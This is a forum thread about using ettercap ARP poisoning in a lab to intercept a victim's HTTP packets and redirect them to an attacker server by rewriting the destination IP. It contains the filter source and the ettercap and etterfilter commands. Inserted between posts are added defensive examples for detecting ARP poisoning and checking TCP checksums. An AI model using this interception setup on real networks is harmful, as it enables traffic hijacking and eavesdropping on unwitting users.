ettercap - intercepting packets and changing destination IP


Post by nwn00bie on Thu Aug 22, 2013 3:21 am

Hello,

Just wondering if this concept is possible or even makes sense.

Basically, using ettercap to ARP spoof and capture packets, then modify the ip.dst field to redirect the packet elsewhere.

i.e. my filter would look like this:

if (ip.proto == TCP && ip.src == '192.168.1.2' && ip.dst == '192.168.2.2' && tcp.dst == 80) {
    ip.dst = '192.168.1.3';
}


Reason for asking is that, I tried a simple test, and it doesn't seem to work. Not asking why it didn't work, but would like to check if this is even possible in the first place.

Thanks,
n3v3n


Re: ettercap - intercepting packets and changing destination IP

Post by Goatboy on Thu Aug 22, 2013 6:51 am

I haven't used ettercap in ages (in fact, I haven't used most things in ages) but if you could provide more details perhaps I could help. What test did you try? What was your network setup? What did you expect and what actually happened?



Re: ettercap - intercepting packets and changing destination IP

Post by limdis on Thu Aug 22, 2013 3:47 pm

Right, need a bit more information on your attack setup. Have you successfully setup a MITM?


Re: ettercap - intercepting packets and changing destination IP

Post by nwn00bie on Thu Aug 22, 2013 10:05 pm

Hi,

Thanks for the replies. My setup is as such:

NETWORK: 192.168.2.0/24
GATEWAY: 192.168.2.1 (AA:AA:AA:AA:AA:AA)

VICTIM: 192.168.2.2 (BB:BB:BB:BB:BB:BB)

ATTACKER: 192.168.2.3 (CC:CC:CC:CC:CC:CC)

ATTACKER-SERVER: 192.168.2.4 (DD:DD:DD:DD:DD:DD)
ATTACKER-SERVER is running Apache server on port 80 (tested accessible from both VICTIM and ATTACKER)


Normal flow: VICTIM would access a web page from the Internet at 123.123.123.123, i.e.
VICTIM (192.168.2.2) -> GATEWAY (192.168.2.1) -> 123.123.123.123


Intended hijacked flow: ATTACKER would hijack the packet (using ARP poisoning) and redirect it to the ATTACKER-SERVER, i.e.
VICTIM (192.168.2.2) -> ATTACKER (192.168.2.3) -> ATTACKER-SERVER (192.168.2.4)


filter.ecf:
if (ip.proto == TCP && ip.src == '192.168.2.2' && ip.dst == '123.123.123.123' && tcp.dst == 80) {
    ip.dst = '192.168.2.4';
}


Ettercap Command:
ettercap -M arp:remote,oneway -T -t TCP -F filter.ef /192.168.2.2/ /192.168.2.1/


Observations:

1. ARP poisoning successful.
a. I can see the ARP packets going around.
b. From the VICTIM's ARP cache, both 192.168.2.1 and 192.168.2.3 have MAC CC:CC:CC:CC:CC:CC

2. Packet sniffing successful. From the ATTACKER, I can see the SYN packet:
Eth src: BB:BB:BB:BB:BB:BB
Eth dst: CC:CC:CC:CC:CC:CC
IP src: 192.168.2.2
IP dst: 123.123.123.123
TCP src: 11111
TCP dst: 80


3. Modification of destination IP seemingly successful. From the ATTACKER, I can see another SYN packet after the original one from VICTIM:
Eth src: CC:CC:CC:CC:CC:CC
Eth dst: DD:DD:DD:DD:DD:DD
IP src: 192.168.2.2
IP dst: 192.168.2.4
TCP src: 11111
TCP dst: 80


4. Packet transmission seemingly successful (at least at IP layer). From the ATTACKER-SERVER, I can see the SYN packet modified and forwarded by ATTACKER:
Eth src: CC:CC:CC:CC:CC:CC
Eth dst: DD:DD:DD:DD:DD:DD
IP src: 192.168.2.2
IP dst: 192.168.2.4
TCP src: 11111
TCP dst: 80


5. It stops here. I'm next expecting a SYN/ACK from the Apache server running on port 80 of ATTACKER-SERVER, but it never comes (not visible even from sniffing on ATTACKER-SERVER itself). Either that, or the forwarded packet just doesn't traverse up the network stack to the TCP layer.

Thanks,
n3v3n
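Observation 1(b) in the post above is the textbook symptom of ARP poisoning as seen from the victim: two IP addresses (here the gateway and another host) resolving to the same hardware address. The script below is an added example, not code from this thread or from ettercap. It parses the two common ARP-cache output styles (`ip neigh show` on Linux and `arp -a` on Windows) and reports every MAC that is claimed by more than one IP. The sample cache contents are constructed to mirror the addresses in the post.

```python
"""Flag the ARP-cache symptom from the thread: one MAC answering for several IPs.

Added example, not code from the thread or from ettercap. The sample ARP
cache contents are constructed to match the thread's setup (gateway .1 and
attacker .3 both resolving to CC:CC:CC:CC:CC:CC).
"""
import re
from collections import defaultdict

# Constructed sample in Linux `ip neigh show` style.
SAMPLE_IP_NEIGH = """\
192.168.2.1 dev eth0 lladdr cc:cc:cc:cc:cc:cc REACHABLE
192.168.2.3 dev eth0 lladdr cc:cc:cc:cc:cc:cc STALE
192.168.2.4 dev eth0 lladdr dd:dd:dd:dd:dd:dd REACHABLE
"""

# Constructed sample in Windows `arp -a` style.
SAMPLE_ARP_A = """\
Interface: 192.168.2.2 --- 0xb
  Internet Address      Physical Address      Type
  192.168.2.1           cc-cc-cc-cc-cc-cc     dynamic
  192.168.2.3           cc-cc-cc-cc-cc-cc     dynamic
  192.168.2.4           dd-dd-dd-dd-dd-dd     dynamic
  192.168.2.255         ff-ff-ff-ff-ff-ff     static
"""

IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
MAC_RE = re.compile(r"\b([0-9a-fA-F]{2}(?:[:-][0-9a-fA-F]{2}){5})\b")
BROADCAST = "ff:ff:ff:ff:ff:ff"


def parse_arp_table(text):
    """Return {ip: mac} from either output style.

    MACs are normalised to lower-case, colon-separated form. Lines without
    both an IPv4 address and a MAC (headers, incomplete entries) are skipped,
    as is the broadcast entry, which is never a real host.
    """
    table = {}
    for line in text.splitlines():
        ip_m, mac_m = IPV4_RE.search(line), MAC_RE.search(line)
        if not ip_m or not mac_m:
            continue
        mac = mac_m.group(1).lower().replace("-", ":")
        if mac == BROADCAST:
            continue
        table[ip_m.group(1)] = mac
    return table


def find_shared_macs(table, gateway=None):
    """Return {mac: [ip, ...]} for every MAC claimed by two or more IPs.

    When the gateway IP is given it is listed first, since a shared gateway
    MAC is the entry that matters most.
    """
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {
        mac: sorted(ips, key=lambda ip: (ip != gateway, ip))
        for mac, ips in by_mac.items()
        if len(ips) > 1
    }


if __name__ == "__main__":
    for name, sample in (("ip neigh", SAMPLE_IP_NEIGH), ("arp -a", SAMPLE_ARP_A)):
        hits = find_shared_macs(parse_arp_table(sample), gateway="192.168.2.1")
        for mac, ips in hits.items():
            print(f"[{name}] {mac} answers for {', '.join(ips)} -- possible ARP poisoning")
```

Feed it the real output of `ip neigh show` or `arp -a` from a host you care about; a gateway MAC that is shared with another host, or that changes between runs, is worth an alert. arpwatch does the same comparison continuously by listening to ARP traffic on the segment.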


Re: ettercap - intercepting packets and changing destination IP

Post by Goatboy on Fri Aug 23, 2013 8:18 am

You named your filter file "filter.ecf" but in your command you pass in "filter.ef"

Check to make sure you're matching file names. Might have been a typo on the forum when you wrote your post, but it doesn't hurt to make sure. This would make sense because ettercap is doing the ARP poison successfully, but it doesn't have a filter rule so it doesn't know to translate the address to 192.168.2.4 (ATTACKER-SERVER).

Also, this is basically the best post I've ever read in regards to asking for help. Seriously. You gave us the setup, expected result, actual result, and related comments. Awesome.


Re: ettercap - intercepting packets and changing destination IP

Post by nwn00bie on Tue Sep 03, 2013 9:13 pm

Hi,

Sorry for the confusion and delayed response.

Goatboy wrote: You named your filter file "filter.ecf" but in your command you pass in "filter.ef"

Check to make sure you're matching file names. Might have been a typo on the forum when you wrote your post, but it doesn't hurt to make sure. This would make sense because ettercap is doing the ARP poison successfully, but it doesn't have a filter rule so it doesn't know to translate the address to 192.168.2.4 (ATTACKER-SERVER).


I missed out a step here, which is compiling the Ettercap filter file:

etterfilter -o filter.ef filter.ecf


In other words, the code I posted is the "source code" for filter.ecf, which is compiled to filter.ef before I can use it with Ettercap.

In any case, I'm quite sure that the packet re-direction by the Ettercap filter was successful, as explained in point (4) of my lengthy post above. Just that, somehow the packet didn't traverse up the network stack to the TCP or application layer.

Just to roll things up a bit,

1. Looking around on the Internet, this doesn't seem to be the way everyone else normally does packet redirection. Nobody else seems to be redirecting packets just by changing the ip.dst field. Seems like the normal way to redirect packets would be to use iptables in conjunction with Ettercap.

2. So it seems like this is the *wrong* way to do packet redirection with Ettercap. Then I'm curious, from a networking perspective, what's wrong with this approach? The packet that is retransmitted after changing the destination IP field is just as legitimate as any other, so how is it that the packet does reach the host that it is intended for, but does not make its way up to the application?

Thanks,
n3v3n
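On point 2 of the last post (why a frame with a rewritten ip.dst reaches the host but never produces a SYN/ACK), one detail of the networking is worth spelling out: the TCP checksum is not computed over the segment alone but over a pseudo-header that includes the source and destination IP addresses (RFC 793). A rewrite of ip.dst that does not recompute the TCP checksum therefore leaves a segment that the receiving kernel discards silently, after the sniffer has already recorded it, which matches "visible on the wire, nothing from the application". Whether the filter in this thread recomputed the TCP checksum cannot be seen in the dumps above (they list only addresses and ports), so it is the first thing to check on the frame captured at ATTACKER-SERVER. The script below is an added example, not code from the thread or from ettercap: it builds a SYN with the thread's addresses and ports, verifies both checksums, and shows the result of rewriting only ip.dst. No traffic is sent.

```python
"""Verify the IPv4 header checksum and the TCP checksum of a captured packet.

Added example, not code from the thread or from ettercap. The SYN is
constructed in memory with the thread's addresses and ports; nothing is sent.
"""
import socket
import struct


def ones_complement_sum(data: bytes) -> int:
    """Internet checksum (RFC 1071) over data, padded to an even length."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:                      # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def tcp_checksum(src_ip: bytes, dst_ip: bytes, segment: bytes) -> int:
    """TCP checksum: pseudo-header (src, dst, zero, protocol, TCP length)
    followed by the segment with its own checksum field zeroed."""
    pseudo = src_ip + dst_ip + struct.pack("!BBH", 0, socket.IPPROTO_TCP, len(segment))
    zeroed = segment[:16] + b"\x00\x00" + segment[18:]
    return ones_complement_sum(pseudo + zeroed)


def build_syn(src_ip: str, dst_ip: str, sport: int, dport: int) -> bytes:
    """Minimal IPv4 + TCP SYN (20-byte headers, no options) with valid checksums."""
    src, dst = socket.inet_aton(src_ip), socket.inet_aton(dst_ip)
    # sport, dport, seq, ack, data offset (5 words), flags (SYN), window, csum, urg
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 0, 5 << 4, 0x02, 65535, 0, 0)
    tcp = tcp[:16] + struct.pack("!H", tcp_checksum(src, dst, tcp)) + tcp[18:]
    # version/IHL, TOS, total length, id, flags/frag (DF), TTL, proto, csum, src, dst
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0x1234, 0x4000,
                     64, socket.IPPROTO_TCP, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", ones_complement_sum(ip)) + ip[12:]
    return ip + tcp


def verify_checksums(packet: bytes):
    """Return (ip_ok, tcp_ok) for an IPv4/TCP packet with the Ethernet header removed."""
    ihl = (packet[0] & 0x0F) * 4
    ip_hdr, tcp_seg = packet[:ihl], packet[ihl:]
    # A header summed together with its own checksum field yields zero when intact.
    ip_ok = ones_complement_sum(ip_hdr) == 0
    src, dst = ip_hdr[12:16], ip_hdr[16:20]
    claimed = struct.unpack("!H", tcp_seg[16:18])[0]
    tcp_ok = tcp_checksum(src, dst, tcp_seg) == claimed
    return ip_ok, tcp_ok


def rewrite_dst_only(packet: bytes, new_dst: str) -> bytes:
    """Emulate a rewrite that changes ip.dst and fixes the IP header checksum
    but leaves the TCP checksum untouched (the case the thread is asking about)."""
    ihl = (packet[0] & 0x0F) * 4
    ip_hdr = bytearray(packet[:ihl])
    ip_hdr[16:20] = socket.inet_aton(new_dst)
    ip_hdr[10:12] = b"\x00\x00"
    ip_hdr[10:12] = struct.pack("!H", ones_complement_sum(bytes(ip_hdr)))
    return bytes(ip_hdr) + packet[ihl:]


if __name__ == "__main__":
    original = build_syn("192.168.2.2", "123.123.123.123", 11111, 80)
    redirected = rewrite_dst_only(original, "192.168.2.4")
    print("original  ", verify_checksums(original))    # (True, True)
    print("redirected", verify_checksums(redirected))  # (True, False): dropped before TCP sees it
```

Wireshark reports the same condition as a bad TCP checksum once checksum validation is enabled in the TCP protocol preferences (it is off by default because of checksum offloading on the capturing host). On a monitoring host, a run of frames with bad transport checksums from a single MAC is itself a useful indicator of on-path header tampering.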


